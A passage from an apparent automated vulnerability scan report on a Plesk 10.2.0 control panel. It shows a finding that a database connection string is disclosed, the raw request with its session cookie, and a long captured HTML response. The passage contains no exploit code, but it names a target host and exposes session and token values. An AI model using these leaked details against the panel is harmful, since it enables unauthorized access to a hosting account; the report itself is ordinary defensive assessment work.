               for (i = 0 ; i < f.elements.length; i++) {
                   if ((f.elements[i].type == "checkbox") && (f.elements[i].name == "del[]") && f.elements[i].checked) {
                       selected++;
                   }
               }
               return selected;
           }

           function perm_click(t, id) {
               el = document.forms[0].elements;
               switch (t) {
               case "ra":
                   if (el["ra_perm[" + id + "]"].checked) {
                       el["rd_perm[" + id + "]"].checked = false;
                       el["fd_perm[" + id + "]"].checked = false;
                       if (el["wa_perm[" + id + "]"].checked && el["xa_perm[" + id + "]"].checked)
                           el["fa_perm[" + id + "]"].checked = true;
                   } else
                       el["fa_perm[" + id + "]"].checked = false;
                   break;
               case "rd":
                   if (el["rd_perm[" + id + "]"].checked) {
                       el["ra_perm[" + id + "]"].checked = false;
                       el["fa_perm[" + id + "]"].checked = false;
                       if (el["wd_perm[" + id + "]"].checked && el["xd_perm[" + id + "]"].checked)
                           el["fd_perm[" + id + "]"].checked = true;
                   } else
                       el["fd_perm[" + id + "]"].checked = false;
                   break;
               case "wa":
                   if (el["wa_perm[" + id + "]"].checked) {
                       el["wd_perm[" + id + "]"].checked = false;
                       el["fd_perm[" + id + "]"].checked = false;
                       if (el["ra_perm[" + id + "]"].checked && el["xa_perm[" + id + "]"].checked)
                           el["fa_perm[" + id + "]"].checked = true;
                   } else
                       el["fa_perm[" + id + "]"].checked = false;
                   break;
               case "wd":
                   if (el["wd_perm[" + id + "]"].checked) {
                       el["wa_perm[" + id + "]"].checked = false;
                       el["fa_perm[" + id + "]"].checked = false;
                       if (el["rd_perm[" + id + "]"].checked && el["xd_perm[" + id + "]"].checked)
                           el["fd_perm[" + id + "]"].checked = true;
                   } else
                       el["fd_perm[" + id + "]"].checked = false;
                   break;
               case "xa":
                   if (el["xa_perm[" + id + "]"].checked) {
                       el["xd_perm[" + id + "]"].checked = false;
                       el["fd_perm[" + id + "]"].checked = false;
                       if (el["ra_perm[" + id + "]"].checked && el["wa_perm[" + id + "]"].checked)
                           el["fa_perm[" + id + "]"].checked = true;
                   } else
                       el["fa_perm[" + id + "]"].checked = false;
                   break;
               case "xd":
                   if (el["xd_perm[" + id + "]"].checked) {
                       el["xa_perm[" + id + "]"].checked = false;
                       el["fa_perm[" + id + "]"].checked = false;
                       if (el["rd_perm[" + id + "]"].checked && el["wd_perm[" + id + "]"].checked)
                           el["fd_perm[" + id + "]"].checked = true;
                   } else
                       el["fd_perm[" + id + "]"].checked = false;
                   break;
               case "fa":
                   if (el["fa_perm[" + id + "]"].checked) {
                       el["ra_perm[" + id + "]"].checked = true;
                       el["wa_perm[" + id + "]"].checked = true;
                       el["xa_perm[" + id + "]"].checked = true;
                       el["rd_perm[" + id + "]"].checked = false;
                       el["wd_perm[" + id + "]"].checked = false;
                       el["xd_perm[" + id + "]"].checked = false;
                       el["fd_perm[" + id + "]"].checked = false;
                   }
                   break;
               case "fd":
                   if (el["fd_perm[" + id + "]"].checked) {
                       el["rd_perm[" + id + "]"].checked = true;
                       el["wd_perm[" + id + "]"].checked = true;
                       el["xd_perm[" + id + "]"].checked = true;
                       el["ra_perm[" + id + "]"].checked = false;
                       el["wa_perm[" + id + "]"].checked = false;
                       el["xa_perm[" + id + "]"].checked = false;
                       el["fa_perm[" + id + "]"].checked = false;
                   }
                   break;

               }
           }
       
</script>

<script type="text/javascript">
Event.observe(window, 'load', function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: []
});
});
</script>

<div class="screenBody" id="">
<div id="warnings"></div>


<form action="/plesk/client@2/domain@1/hosting/file-manager/create-file/" method="post" enctype="multipart/form-data" >
   <input type="text" name="iesingletextinputworkaround" disabled style="display: none">
<input type="hidden" name="forgery_protection_token" value="dc1721730e046f7e1de14c19e4a424be">
   <input type="hidden" name="cmd" value="new_file">
   <input type="hidden" name="lock" value="false">
   <input type="hidden" name="previous_page" value="">
   <input type="hidden" name="wizaction">

   




<div class="filemanagerTitle">
   Create new file in <span class="name"><A href="/plesk/client@2/domain@1/hosting/file-manager/create-file/?cmd=chdir&amp;file=%2F" onClick=";lon();">vulnerable.host.fqdn</a></span>
</div>

<div class="formArea">
   <fieldset>
       <legend><input type="radio" class="checkbox" name="create_file_method" id="fid-upload_file_method" value="upload" > <label for="fid-upload_file_method">Upload file</label></legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

       <table class="formFields" cellspacing="0" width="100%">
           <tr>
               <td class="name">Path to file</td>
               <td><input type="file" name="userfile[0]"> <label for="fid-extract1">Upload archive and extract it</label> <input type="checkbox" class="checkbox" name="extract[0]" id="fid-extract1" value="true"></td>
           </tr>
           <tr>
               <td class="name">Path to file</td>
               <td><input type="file" name="userfile[1]"> <label for="fid-extract2">Upload archive and extract it</label> <input type="checkbox" class="checkbox" name="extract[1]" id="fid-extract2" value="true"></td>
           </tr>
           <tr>
               <td class="name">Path to file</td>
               <td><input type="file" name="userfile[2]"> <label for="fid-extract3">Upload archive and extract it</label> <input type="checkbox" class="checkbox" name="extract[2]" id="fid-extract3" value="true"></td>
           </tr>
       </table>

   </td></tr></table></fieldset>

   <fieldset>
       <legend><input type="radio" class="checkbox" name="create_file_method" id="fid-create_file_method" value="upload" checked> <label for="fid-create_file_method">File creation</label></legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

       <table class="formFields" cellspacing="0" width="100%">
           <tr>
               <td class="name">File name <span class="required">*</span></td>
               <td><input type="text" name="new_file" value=""></td>
           </tr>

           <tr>
               <td class="name">Use HTML template</td>
               <td><input type="checkbox" class="checkbox" name="htmltemplate" value="true"></td>
           </tr>

       </table>

   </td></tr></table></fieldset>
</div>






















<input type="hidden" name="file" value="">
<input type="hidden" name="subcmd" value="">



   <div class="formArea">
       <table width="100%" class="buttons" cellspacing="0" cellpadding="0"><tr>
           <td class="main" width="0"></td>
           <td class="footnote"><span class="required">*</span> Required fields</td>
           <td class="misc" width="0" nowrap><DIV class="commonButton" id="bid-ok" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Enter the file name and click to create it in the current directory.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);create_file_oC();;return false;" style=""><BUTTON name="bname_ok" id="buttonid-ok" type="submit" onClick="Event.stop(event);create_file_oC();;return false;">OK</BUTTON><SPAN id="spanid-ok">OK</SPAN><INPUT type="image" style="border: 0pt none ; height: 0pt; width: 0pt; position: absolute; left: -9999px;" src="/skins/default/plesk/images/1x1.gif"></DIV><DIV class="commonButton" id="bid-cancel" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Discard any changes and return to the previous page.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);cancel_oC();;return false;" style=""><BUTTON name="bname_cancel" id="buttonid-cancel" type="button" onClick="Event.stop(event);cancel_oC();;return false;">Cancel</BUTTON><SPAN id="spanid-cancel">Cancel</SPAN></DIV></td>
       </tr></table>
   </div>


</form>

</div>
</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

10. Database connection string disclosed

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.nosedivesailing.com:8880
Path:   /plesk/client@2/domain@1/hosting/aspdotnet/

Issue detail

The following database connection string was disclosed in the response:

Issue background

A database connection string specifies information about a data source and the means of connecting to it. In web applications, connection strings are generally used by the application tier to connect to the back-end database used for storing application data. They are usually read from server-side configuration files or hard-coded into application source code.

Issue remediation

It is almost never necessary for applications to disclose database connection strings to clients. You should review the reason for the disclosure and prevent it from ever happening.

Request

GET /plesk/client@2/domain@1/hosting/aspdotnet/ HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PLESKSESSID=66f4f3aa52eb21d7134fc0175f742f5a; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 19:14:26 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 19:14:28 GMT
Connection: close
Content-Length: 46372

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="dc1721730e046f7e1de14c19e4a424be" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />


<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/general.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/layout.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/custom.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/desktop.css?2">
<!--[if IE]><link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/ie.css?2"><![endif]-->







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<link href="/skins/default/css/customer/plesk.css?1269638970" media="screen" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<script type="text/javascript" src="/javascript/tooltip.js?1302230642"></script>
<script type="text/javascript" src="/javascript/widget.js?1302230642"></script>
<script type="text/javascript" src="/javascript/chk.js.php?1302230642"></script>
<script type="text/javascript" src="/javascript/common.js?1302230642"></script>
<script type="text/javascript" src="/admin/scripts/admin-panel.js?"></script>
<title>Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/redirect/action-name/pleskin" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fredirect%2Fpleskin%2Froot%2F%2F%3Fdst%3D%252Fplesk%252Fclient%25402%252Fshared-ssl%252F%26src%3D%252Fsmb%252Fweb%252Fview%26srcController%3DWebController' + '&activeModule=' + 'webSitesAndDomains' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"active","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading ">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb#">
<span>Up Level</span>
</a>
</div>
<h2><span>ASP.NET Configuration for Website</span></h2>
</div>
</div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
var opt_no_frames = true;
Jsw.baseUrl = '/smb';

SetHelpModule = function(module)
{
PleskHelpModule = module;
}
var PleskHelpModule = null;

Jsw.onReady(function() {

$$('.top-help').each(function(topHelp) {
topHelp.select('a').each(function(help) {
help.href = help.href + '/plesk-context/aspdotnet_dom/';
if (PleskHelpModule) {
help.href = help.href + '/plesk-module/' + PleskHelpModule + '/';
}
});
});

$$('.sb-uplevel').each(function(link) {
link.href = '/plesk/hosting-panel=web.view/';
});

if ('') {
$('content').down('.heading').addClassName('');
}
});

var opt_integrated_mode = false;

function update_oC(f)
{
   f.cmd.value = "update";
   lsubmit(f);
   return false;
}

function restore_default_oC(f)
{
   if (!confirm("Restore default ASP.NET settings?"))
       return false;
   f.cmd.value = "restore_default";
   lsubmit(f);
   return false;
}
function custom_errors_status_check(val) {
   if (!chk_uint(val))
       return "Number is invalid.";
   return true;
}
       
</script>

<script type="text/javascript">
Event.observe(window, 'load', function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: []
});
});
</script>

<div class="screenBody" id="">
<div id="warnings"></div>


<form action="/plesk/client@2/domain@1/hosting/aspdotnet/" method="post" enctype="multipart/form-data" >

   <div class="formArea">
       
<div class="toolsArea">
   <fieldset>
       <legend>Tools</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

       <div class="screenButtons">
           <DIV class="commonButton" id="bid-change-version" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Change ASP.NET version used by this domain.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);f = document.forms[0];
           f.cmd.value = &#039;&#039;;
           f.action = &#039;/plesk/client@2/domain@1/hosting/aspdotnet/change-version/&#039;;
           lsubmit(f);
           return false;;return false;" style=""><BUTTON name="bname_change-version" id="buttonid-change-version" type="button" onClick="Event.stop(event);f = document.forms[0];
           f.cmd.value = &#039;&#039;;
           f.action = &#039;/plesk/client@2/domain@1/hosting/aspdotnet/change-version/&#039;;
           lsubmit(f);
           return false;;return false;">Change Version</BUTTON><SPAN id="spanid-change-version">Change Version</SPAN></DIV>
           <DIV class="commonButton" id="bid-restore-default" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Restore server default ASP.NET settings.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);restore_default_oC(document.forms[0]); return false;;return false;" style=""><BUTTON name="bname_restore_default" id="buttonid-restore-default" type="button" onClick="Event.stop(event);restore_default_oC(document.forms[0]); return false;;return false;">Set to Default</BUTTON><SPAN id="spanid-restore-default">Set to Default</SPAN></DIV>
       </div>
       
   </td></tr></table></fieldset>
</div>


<div class="formArea">


<fieldset>

<legend>Framework Version</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

   <table class="formFields" cellspacing="0" width="100%">


       <tr >
           <td class="name"><label for="fid-version">Version</label></td>
           <td>


   2.0.50727.4927<input type="hidden" name="version" value="2.0.50727.4927">








           </td>
       </tr>

   </table>

</td></tr></table></fieldset>

<fieldset>

<legend>Connection String Manager</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

   <table class="formFields" cellspacing="0" width="100%">


       <tr >
           <td class="name"><label for="fid-conn_strings">Connection strings</label></td>
           <td>




   <script language="javascript" type="text/javascript" src="/javascript/editlist.js"></script><div id="conn_strings"></div><script>
var conn_strings_columns = new Array();
conn_strings_columns[0] = new Array();
conn_strings_columns[0]['size'] = 30;
conn_strings_columns[0]['name'] = 'conn_string_name';
conn_strings_columns[0]['text'] = 'Name';
conn_strings_columns[0]['type'] = 'text';
conn_strings_columns[0]['editable'] = false;
conn_strings_columns[0]['required'] = true;
conn_strings_columns[0]['primary'] = true;
conn_strings_columns[0]['check'] = null;
conn_strings_columns[1] = new Array();
conn_strings_columns[1]['size'] = 70;
conn_strings_columns[1]['name'] = 'conn_string_value';
conn_strings_columns[1]['text'] = 'Connection Parameters';
conn_strings_columns[1]['type'] = 'text';
conn_strings_columns[1]['editable'] = true;
conn_strings_columns[1]['required'] = true;
conn_strings_columns[1]['primary'] = false;
conn_strings_columns[1]['check'] = null;
var conn_strings_data = new Array();
var conn_strings_can_delete = new Array();
var conn_strings_additional_data = new Array();
conn_strings_data[0] = new Array('LocalSqlServer', 'data source=.\\SQLEXPRESS;Integrated Security=SSPI;AttachDBFilename=|DataDirectory|aspnetdb.mdf;User Instance=true');
conn_strings_can_delete[0] = true;
conn_strings_additional_data[0] = '';
var conn_stringsEditListObj = new psaEditList('conn_strings', true);
conn_stringsEditListObj.setColumns(conn_strings_columns);
conn_stringsEditListObj.setAllData(conn_strings_data, conn_strings_can_delete);
conn_stringsEditListObj.setAllAdditionalData(conn_strings_additional_data);
conn_stringsEditListObj.setAddIcon('/skins/default/plesk/icons/list_item_add.gif', 16, 16);
conn_stringsEditListObj.setAddDisabledIcon('/skins/default/plesk/icons/list_item_add-disabled.gif', 16, 16);
conn_stringsEditListObj.setDelIcon('/skins/default/plesk/icons/list_item_remove.gif', 16, 16);
conn_stringsEditListObj.setDelDisabledIcon('/skins/default/plesk/icons/list_item_remove-disabled.gif', 16, 16);
conn_stringsEditListObj.render('conn_strings');
</script>






           </td>
       </tr>

   </table>

</td></tr></table></fieldset>

<fieldset>

<legend>Custom Error Settings</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

   <table class="formFields" cellspacing="0" width="100%">


       <tr >
           <td class="name"><label for="fid-custom_err_mode">Custom error mode</label></td>
           <td>



   <select name="custom_err_mode" id="fid-custom_err_mode" >    <option value='On'>On</option>
   <option value='Off'>Off</option>
   <option value='RemoteOnly' SELECTED>RemoteOnly</option>
</select>








           </td>
       </tr>

       <tr >
           <td class="name"><label for="fid-custom_errors">Custom errors</label></td>
           <td>




   <script language="javascript" type="text/javascript" src="/javascript/editlist.js"></script><div id="custom_errors"></div><script>
var custom_errors_columns = new Array();
custom_errors_columns[0] = new Array();
custom_errors_columns[0]['size'] = 30;
custom_errors_columns[0]['name'] = 'custom_error_status';
custom_errors_columns[0]['text'] = 'Status Code';
custom_errors_columns[0]['type'] = 'text';
custom_errors_columns[0]['editable'] = false;
custom_errors_columns[0]['required'] = true;
custom_errors_columns[0]['primary'] = true;
custom_errors_columns[0]['check'] = custom_errors_status_check;
custom_errors_columns[1] = new Array();
custom_errors_columns[1]['size'] = 70;
custom_errors_columns[1]['name'] = 'custom_error_redirect';
custom_errors_columns[1]['text'] = 'Redirect URL';
custom_errors_columns[1]['type'] = 'text';
custom_errors_columns[1]['editable'] = true;
custom_errors_columns[1]['required'] = true;
custom_errors_columns[1]['primary'] = false;
custom_errors_columns[1]['check'] = null;
var custom_errors_data = new Array();
var custom_errors_can_delete = new Array();
var custom_errors_additional_data = new Array();
var custom_errorsEditListObj = new psaEditList('custom_errors', true);
custom_errorsEditListObj.setColumns(custom_errors_columns);
custom_errorsEditListObj.setAllData(custom_errors_data, custom_errors_can_delete);
custom_errorsEditListObj.setAllAdditionalData(custom_errors_additional_data);
custom_errorsEditListObj.setAddIcon('/skins/default/plesk/icons/list_item_add.gif', 16, 16);
custom_errorsEditListObj.setAddDisabledIcon('/skins/default/plesk/icons/list_item_add-disabled.gif', 16, 16);
custom_errorsEditListObj.setDelIcon('/skins/default/plesk/icons/list_item_remove.gif', 16, 16);
custom_errorsEditListObj.setDelDisabledIcon('/skins/default/plesk/icons/list_item_remove-disabled.gif', 16, 16);
custom_errorsEditListObj.render('custom_errors');
</script>






           </td>
       </tr>

   </table>

</td></tr></table></fieldset>

<fieldset>

<legend>Compilation and Debugging</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

   <table class="formFields" cellspacing="0" width="100%">


       <tr >
           <td class="name"><label for="fid-def_language">Default web page language</label></td>
           <td>



   <select name="def_language" id="fid-def_language" >    <option value='c#'>c#</option>
   <option value='vb' SELECTED>vb</option>
   <option value='js'>js</option>
   <option value='vj#'>vj#</option>
   <option value='c++'>c++</option>
   <option value='c++7'>c++7</option>
</select>








           </td>
       </tr>

       <tr >
           <td class="name"><label for="fid-debug_mode">Switch on debugging</label></td>
           <td>







   <input type="checkbox" class="checkbox" name="debug_mode" id="fid-debug_mode" value="true" >



           </td>
       </tr>

   </table>

</td></tr></table></fieldset>

<fieldset>

<legend>Globalization Settings</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

   <table class="formFields" cellspacing="0" width="100%">


       <tr >
           <td class="name"><label for="fid-req_enc">Request encoding</label></td>
           <td>






   <input type="text" name="req_enc" id="fid-req_enc" value="utf-8"} size="15">




           </td>
       </tr>

       <tr >
           <td class="name"><label for="fid-res_enc">Response encoding</label></td>
           <td>






   <input type="text" name="res_enc" id="fid-res_enc" value="utf-8"} size="15">




           </td>
       </tr>

       <tr >
           <td class="name"><label for="fid-file_enc">File encoding</label></td>
           <td>






   <input type="text" name="file_enc" id="fid-file_enc" value="Windows-1252"} size="15">




           </td>
       </tr>

       <tr >
           <td class="name"><label for="fid-culture">Culture</label></td>
           <td>



   <select name="culture" id="fid-culture" >    <option value='af-ZA'>Afrikaans (South Africa)</option>
   <option value='sq-AL'>Albanian (Albania)</option>
   <option value='gsw-FR'>Alsatian (France)</option>
   <option value='am-ET'>Amharic (Ethiopia)</option>
   <option value='ar-DZ'>Arabic (Algeria)</option>
   <option value='ar-BH'>Arabic (Bahrain)</option>
   <option value='ar-EG'>Arabic (Egypt)</option>
   <option value='ar-IQ'>Arabic (Iraq)</option>
   <option value='ar-JO'>Arabic (Jordan)</option>
   <option value='ar-KW'>Arabic (Kuwait)</option>
   <option value='ar-LB'>Arabic (Lebanon)</option>
   <option value='ar-LY'>Arabic (Libya)</option>
   <option value='ar-MA'>Arabic (Morocco)</option>
   <option value='ar-OM'>Arabic (Oman)</option>
   <option value='ar-QA'>Arabic (Qatar)</option>
   <option value='ar-SA'>Arabic (Saudi Arabia)</option>
   <option value='ar-SY'>Arabic (Syria)</option>
   <option value='ar-TN'>Arabic (Tunisia)</option>
   <option value='ar-AE'>Arabic (U.A.E.)</option>
   <option value='ar-YE'>Arabic (Yemen)</option>
   <option value='hy-AM'>Armenian (Armenia)</option>
   <option value='as-IN'>Assamese (India)</option>
   <option value='az-Cyrl-AZ'>Azeri (Cyrillic, Azerbaijan)</option>
   <option value='az-Latn-AZ'>Azeri (Latin, Azerbaijan)</option>
   <option value='ba-RU'>Bashkir (Russia)</option>
   <option value='eu-ES'>Basque (Basque)</option>
   <option value='be-BY'>Belarusian (Belarus)</option>
   <option value='bn-BD'>Bengali (Bangladesh)</option>
   <option value='bn-IN'>Bengali (India)</option>
   <option value='bs-Cyrl-BA'>Bosnian (Cyrillic) (Bosnia and Herzegovina)</option>
   <option value='bs-Latn-BA'>Bosnian (Latin) (Bosnia and Herzegovina)</option>
   <option value='br-FR'>Breton (France)</option>
   <option value='bg-BG'>Bulgarian (Bulgaria)</option>
   <option value='ca-ES'>Catalan (Catalan)</option>
   <option value='zh-HK'>Chinese (Hong Kong S.A.R.)</option>
   <option value='zh-MO'>Chinese (Macao S.A.R.)</option>
   <option value='zh-CN'>Chinese (People&#039;s Republic of China)</option>
   <option value='zh-SG'>Chinese (Singapore)</option>
   <option value='zh-TW'>Chinese (Taiwan)</option>
   <option value='co-FR'>Corsican (France)</option>
   <option value='hr-HR'>Croatian (Croatia)</option>
   <option value='hr-BA'>Croatian (Latin) (Bosnia and Herzegovina)</option>
   <option value='cs-CZ'>Czech (Czech Republic)</option>
   <option value='da-DK'>Danish (Denmark)</option>
   <option value='prs-AF'>Dari (Afghanistan)</option>
   <option value='dv-MV'>Divehi (Maldives)</option>
   <option value='nl-BE'>Dutch (Belgium)</option>
   <option value='nl-NL'>Dutch (Netherlands)</option>
   <option value='en-AU'>English (Australia)</option>
   <option value='en-BZ'>English (Belize)</option>
   <option value='en-CA'>English (Canada)</option>
   <option value='en-029'>English (Caribbean)</option>
   <option value='en-IN'>English (India)</option>
   <option value='en-IE'>English (Ireland)</option>
   <option value='en-JM'>English (Jamaica)</option>
   <option value='en-MY'>English (Malaysia)</option>
   <option value='en-NZ'>English (New Zealand)</option>
   <option value='en-PH'>English (Republic of the Philippines)</option>
   <option value='en-SG'>English (Singapore)</option>
   <option value='en-ZA'>English (South Africa)</option>
   <option value='en-TT'>English (Trinidad and Tobago)</option>
   <option value='en-GB'>English (United Kingdom)</option>
   <option value='en-US'>English (United States)</option>
   <option value='en-ZW'>English (Zimbabwe)</option>
   <option value='et-EE'>Estonian (Estonia)</option>
   <option value='fo-FO'>Faroese (Faroe Islands)</option>
   <option value='fil-PH'>Filipino (Philippines)</option>
   <option value='fi-FI'>Finnish (Finland)</option>
   <option value='fr-BE'>French (Belgium)</option>
   <option value='fr-CA'>French (Canada)</option>
   <option value='fr-FR'>French (France)</option>
   <option value='fr-LU'>French (Luxembourg)</option>
   <option value='fr-MC'>French (Principality of Monaco)</option>
   <option value='fr-CH'>French (Switzerland)</option>
   <option value='fy-NL'>Frisian (Netherlands)</option>
   <option value='gl-ES'>Galician (Galician)</option>
   <option value='ka-GE'>Georgian (Georgia)</option>
   <option value='de-AT'>German (Austria)</option>
   <option value='de-DE'>German (Germany)</option>
   <option value='de-LI'>German (Liechtenstein)</option>
   <option value='de-LU'>German (Luxembourg)</option>
   <option value='de-CH'>German (Switzerland)</option>
   <option value='el-GR'>Greek (Greece)</option>
   <option value='kl-GL'>Greenlandic (Greenland)</option>
   <option value='gu-IN'>Gujarati (India)</option>
   <option value='ha-Latn-NG'>Hausa (Latin) (Nigeria)</option>
   <option value='he-IL'>Hebrew (Israel)</option>
   <option value='hi-IN'>Hindi (India)</option>
   <option value='hu-HU'>Hungarian (Hungary)</option>
   <option value='is-IS'>Icelandic (Iceland)</option>
   <option value='ig-NG'>Igbo (Nigeria)</option>
   <option value='id-ID'>Indonesian (Indonesia)</option>
   <option value='iu-Latn-CA'>Inuktitut (Latin) (Canada)</option>
   <option value='iu-Cans-CA'>Inuktitut (Syllabics) (Canada)</option>
   <option value='' SELECTED>Invariant</option>
   <option value='ga-IE'>Irish (Ireland)</option>
   <option value='it-IT'>Italian (Italy)</option>
   <option value='it-CH'>Italian (Switzerland)</option>
   <option value='ja-JP'>Japanese (Japan)</option>
   <option value='qut-GT'>K&#039;iche (Guatemala)</option>
   <option value='kn-IN'>Kannada (India)</option>
   <option value='kk-KZ'>Kazakh (Kazakhstan)</option>
   <option value='km-KH'>Khmer (Cambodia)</option>
